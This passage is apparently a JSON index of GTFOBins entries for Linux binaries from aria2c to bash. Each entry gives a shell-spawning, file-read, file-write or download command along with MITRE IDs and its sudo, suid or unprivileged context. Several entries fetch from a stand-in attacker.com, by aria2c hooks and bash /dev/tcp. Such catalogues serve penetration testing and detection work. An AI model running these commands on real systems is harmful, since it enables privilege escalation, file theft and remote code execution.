--gid=aaaaaaaaaaaaaaaa --on-download-complete=/bin/sh http://attacker.com/aaaaaaaaaaaaaaaa","description":"The remote file `aaaaaaaaaaaaaaaa` (must be a string of 16 hex digit) contains the shell script, e.g., `/path/to/command`. Note that said file needs to be written on disk in order to be executed. `--allow-overwrite` is needed if this is executed multiple times with the same GID.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:download:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"aria2c -o /path/to/ouput-file http://attacker.com/path/to/input-file","description":"Use `--allow-overwrite` if needed. Similarly `-o /path/to/ouput-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:sudo","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:suid","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:aria2c:file-read:0:unprivileged","toolId":"gtfo:aria2c","toolName":"aria2c","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aria2c -i /path/to/input-file","description":"The file is leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aria2c/"]},{"id":"gtfo:arj:file-read:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-read:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-read:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arj a /path/to/output-file /path/to/input-file\narj p /path/to/output-file","description":"The `.arj` suffix will be added to `output-file`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:sudo","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:suid","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arj:file-write:0:unprivileged","toolId":"gtfo:arj","toolName":"arj","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >output-file\narj a x output-file\narj e x /path/to/output-dir/","description":"The `.arj` suffix will be added to `x`.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arj/"]},{"id":"gtfo:arp:file-read:0:sudo","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:arp:file-read:0:suid","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:arp:file-read:0:unprivileged","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:as:file-read:0:sudo","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:as:file-read:0:suid","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:as:file-read:0:unprivileged","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:ascii-xfr:file-read:0:sudo","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii-xfr:file-read:0:suid","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii-xfr:file-read:0:unprivileged","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii85:file-read:0:sudo","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii85/"]},{"id":"gtfo:ascii85:file-read:0:unprivileged","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii85/"]},{"id":"gtfo:ash:file-write:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:file-write:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:file-write:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:aspell:file-read:0:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:0:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:0:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:asterisk:shell:0:sudo","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:asterisk:shell:0:suid","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:asterisk:shell:0:unprivileged","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:at:command:0:sudo","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:command:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:shell:0:sudo","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:shell:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:atobm:file-read:0:sudo","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:atobm:file-read:0:suid","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:atobm:file-read:0:unprivileged","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:autoconf:shell:0:sudo","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoconf/"]},{"id":"gtfo:autoconf:shell:0:unprivileged","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoconf/"]},{"id":"gtfo:autoheader:shell:0:sudo","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoheader/"]},{"id":"gtfo:autoheader:shell:0:unprivileged","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoheader/"]},{"id":"gtfo:autoreconf:shell:0:sudo","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoreconf/"]},{"id":"gtfo:autoreconf:shell:0:unprivileged","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoreconf/"]},{"id":"gtfo:aws:file-read:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:file-read:0:suid","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:file-read:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:inherit:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:inherit:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:base32:file-read:0:sudo","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base32:file-read:0:suid","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base32:file-read:0:unprivileged","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base58:file-read:0:sudo","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base58/"]},{"id":"gtfo:base58:file-read:0:unprivileged","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base58/"]},{"id":"gtfo:base64:file-read:0:sudo","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:base64:file-read:0:suid","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:base64:file-read:0:unprivileged","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:basenc:file-read:0:sudo","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basenc:file-read:0:suid","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basenc:file-read:0:unprivileged","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basez:file-read:0:sudo","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:basez:file-read:0:suid","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:basez:file-read:0:unprivileged","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:bash:download:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne 